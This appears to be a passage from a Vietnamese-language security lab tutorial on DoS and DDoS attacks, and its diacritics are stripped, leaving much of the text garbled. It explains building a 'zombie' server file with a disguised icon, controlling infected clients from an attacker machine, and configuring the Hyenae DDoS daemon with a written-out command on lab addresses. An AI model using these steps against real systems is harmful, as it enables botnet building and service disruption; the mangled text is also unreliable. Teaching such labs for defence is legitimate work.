lick Next chng trnh chuyn qua mc uild, ta c th chuyn icon ca file zombie, lick Generate , x c nh v tr lu tr, tn file zombie
47
v tr my attacker, ta s dng t nh nng New lient qun l cc kt n i t cc zombie, chn vo tn Profile m attacker to.
48
hng trnh yu cu ta phi nh p vo PASSWORD hoc l ta phi LOAD KEY ty thuc vo phng thc password cu hnh trn
Sau khi client kch hot file dos_server.exe, ta kim tra cc kt n i ta thy xut hin mt kt n i
49
Ta Double-click vo dng biu th cho client, hin th y cc tc v m attacker c th lm i v i zombie ( ty thuc vo cu hnh ban u )
50
51
7. Dos v DdoS b ng cng c Hyenae - Download chng trnh ti http://sourceforge.net/projects/hyenae/files/ hng trnh ny cho php ta thc hin tn cng DoS v DdoS. thc hin DdoS ta cn phi install Hyenae daemon trn 1 m y, sau s dng Hyenae Front End ( giao din ) hoc Hyenae ( dng lnh iu khin ) - Trong bi lab ny ta s install Hyenae daemon trn my Window server 2003 (192.168.1.100/24) v s dng Window XP (192.168.1.101/24) lm client iu khin.
52
u tin ta s cu hnh hyenaed kim tra cc card trong my tnh C:\> hyenaed.exe -l kim tra cc card mng c nh n trong chng trnh Gi s chng trnh nh n card Intel Pro/1000 MT c nh n l s 1 Cu hnh hyenaed.exe lng nghe trn my tnh server 2003 C:\> hyenaed.exe -I 1 -a 192.168.1.100 p 8888 u 10000 k 123abc!!! -I: card kt n i vo -a: bind v i IP -p: port -u: s lng packet gi cho mi ln kt n i S dng hyenae.exe dng front end kt n i
53